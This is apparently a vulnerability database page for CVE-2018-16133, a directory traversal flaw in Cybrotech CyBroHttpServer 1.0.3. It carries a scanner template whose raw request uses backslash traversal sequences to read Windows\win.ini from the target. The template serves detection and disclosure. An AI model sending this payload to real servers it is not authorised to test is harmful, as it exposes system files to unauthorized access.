CVE-2018-16133: Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion

日期: 2025-08-01 | 影响软件: Cybrotech CyBroHttpServer | POC: 已公开

漏洞描述

Cybrotech CyBroHttpServer 1.0.3 is vulnerable to local file inclusion in the URI.

PoC代码[已公开]

id: CVE-2018-16133

info:
  name: Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion
  author: 0x_Akoko
  severity: medium
  description: Cybrotech CyBroHttpServer 1.0.3 is vulnerable to local file inclusion in the URI.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the affected system.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Cybrotech CyBroHttpServer 1.0.3.
  reference:
    - https://packetstormsecurity.com/files/149177/Cybrotech-CyBroHttpServer-1.0.3-Directory-Traversal.html
    - http://www.cybrotech.com/
    - https://github.com/EmreOvunc/CyBroHttpServer-v1.0.3-Directory-Traversal
    - https://nvd.nist.gov/vuln/detail/CVE-2018-16133
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2018-16133
    cwe-id: CWE-22
    epss-score: 0.57542
    epss-percentile: 0.98094
    cpe: cpe:2.3:a:cybrotech:cybrohttpserver:1.0.3:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: cybrotech
    product: cybrohttpserver
  tags: cve2018,cve,lfi,packetstorm,cybrotech

http:
  - raw:
      - |+
        GET \..\..\..\..\Windows\win.ini HTTP/1.1
        Host: {{Hostname}}

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
# digest: 4b0a00483046022100f809ee23f855fd664824b0d51b3e065fc7964dc8f7f35e4f01d92d244dd17cbf022100f77f45a554cf046eddff97871bd03631943843ec1225ea016f95927b8ec1857a:922c64590222798bb761d5b6d8e72950

相关漏洞推荐